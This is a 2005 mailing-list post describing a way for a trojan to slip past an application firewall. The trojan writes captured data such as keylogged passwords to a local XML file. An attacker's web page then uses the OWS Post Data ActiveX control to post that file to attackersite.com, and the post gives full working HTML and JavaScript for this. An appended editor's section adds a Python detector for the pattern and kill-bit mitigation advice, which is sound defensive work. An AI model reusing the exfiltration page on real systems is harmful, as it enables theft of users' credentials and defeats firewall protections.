Date: Wed Dec 21 15:32:05 2005
From: gaurav at securebox.org (Gaurav Kumar)
Subject: new attack technique? using JavaScript+XML+OWS Post Data

While researching COM related security vulnerabilities I thought of
this possible attack technique, not sure if it has been discussed
before.


Problem/challenge statement:

A Trojan has been placed in a system running an application
firewall like Zone Alarm Pro, etc. The Trojan is not allowed to make
any outbound connections. The challenge is to send data (key-logged
passwords, etc.) back to the attacker.


Assumptions:

The target system must have Office XP, and the user has to be
lured to view a webpage hosted by the attacker.


Solution:

The Trojan can be designed to generate an xml file which will contain
the data to be sent out. The attacker will lure the user to visit a
website hosted by him. The site can have the following HTML code:

<html>
<body>
The author is not responsible for any misuse, this PoC is for
educational purpose only.
<object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
id="exp">
</object>
<script LANGUAGE=javascript>
var xmlDoc
xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.async=false;
xmlDoc.load("c:\\note.xml");
xmlObj=xmlDoc.documentElement;
var a= xmlObj.firstChild.text;
exp.Post(0,"http://www.attackersite.com/input.asp",a);
</script>
</body>
</html>

Content of note.xml could be:

<password>secret</password>


The above code (works well on Windows XP SP2) essentially calls the "OWS
Post Data" COM control to post the contents of note.xml (generated by the
Trojan) to attackersite.com.

Essentially, the technique is breaking the basic functionality of
application firewalls by using OWS Post Data as a bridge for sending out
the data using JavaScript and XML.


Disclaimer-
I am not responsible for any misuse or damage arising out of the above technique.

flames/spam/abuse etc can be sent to spam@...urebox.org
comments can be sent to gaurav@...urebox.org

Regards,
Gaurav Kumar.
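Editor's note: the following is an added defensive example, not code from the post above. It shows how a web proxy or mail gateway filter could flag HTML that instantiates the OWS Post Data control and pairs it with a local-file XML load and a Post() call, which is the combination the post describes. The CLSID is the one quoted in the post; the indicator names, the regular expressions, the two sample pages and the example.invalid URL are the editor's own constructions.

```python
import re

# CLSID of the "OWS Post Data" control exactly as quoted in the post above.
OWS_POST_DATA_CLSID = "BDEADE98-C265-11D0-BCED-00A0C90AB50F"

# Indicators, one regex each, matched case-insensitively over raw HTML text.
# Names and patterns are the editor's assumptions, not a published signature set.
INDICATORS = {
    # <object classid="clsid:{BDEADE98-...}"> instantiating the control
    "ows_post_data_object": re.compile(
        r"classid\s*=\s*[\"']?\s*clsid:\{?" + re.escape(OWS_POST_DATA_CLSID) + r"\}?",
        re.I,
    ),
    # script creating an MSXML DOM via ActiveX
    "msxml_activex": re.compile(
        r"new\s+ActiveXObject\s*\(\s*[\"']Microsoft\.XMLDOM[\"']\s*\)", re.I
    ),
    # .load() pointed at a local drive path (c:\...) or a file: URL
    "local_file_load": re.compile(
        r"\.load\s*\(\s*[\"'](?:[a-z]:\\|file:)", re.I
    ),
    # a .Post( call on some object (the control's outbound method)
    "post_call": re.compile(r"\.Post\s*\(", re.I),
}


def scan_html(html):
    """Return the names of all indicators present in the HTML text."""
    return [name for name, pat in INDICATORS.items() if pat.search(html)]


def classify(html):
    """Map the indicator hits to a severity string plus the hit list.

    'high'   : the OWS control is instantiated AND a .Post( call is present
    'medium' : two or more indicators, but not that exact pairing
    'low'    : a single indicator (MSXML alone is common in legitimate pages)
    'none'   : nothing matched
    """
    hits = scan_html(html)
    if "ows_post_data_object" in hits and "post_call" in hits:
        return "high", hits
    if len(hits) >= 2:
        return "medium", hits
    if hits:
        return "low", hits
    return "none", hits


# Constructed sample mirroring the structure of the page in the post;
# the URL is a placeholder, not the address used in the original.
SUSPICIOUS_PAGE = """<html><body>
<object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}" id="exp"></object>
<script LANGUAGE=javascript>
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.async = false;
xmlDoc.load("c:\\\\note.xml");
var a = xmlDoc.documentElement.firstChild.text;
exp.Post(0, "http://example.invalid/input.asp", a);
</script></body></html>"""

# Constructed benign sample: ordinary XMLHttpRequest use, no ActiveX.
BENIGN_PAGE = """<html><body>
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "/api/status.xml");
xhr.send();
</script></body></html>"""


if __name__ == "__main__":
    for label, page in (("suspicious", SUSPICIOUS_PAGE), ("benign", BENIGN_PAGE)):
        severity, hits = classify(page)
        print(f"{label}: {severity} {hits}")
```

The severity ladder is deliberately conservative: MSXML alone is ordinary in pages of that era, so only the control's CLSID together with a `.Post(` call is treated as high. On the host side, the standard mitigation for an unwanted ActiveX control is its kill bit, the `Compatibility Flags` DWORD value `0x400` under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}`, which stops Internet Explorer from instantiating the control regardless of the page content.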
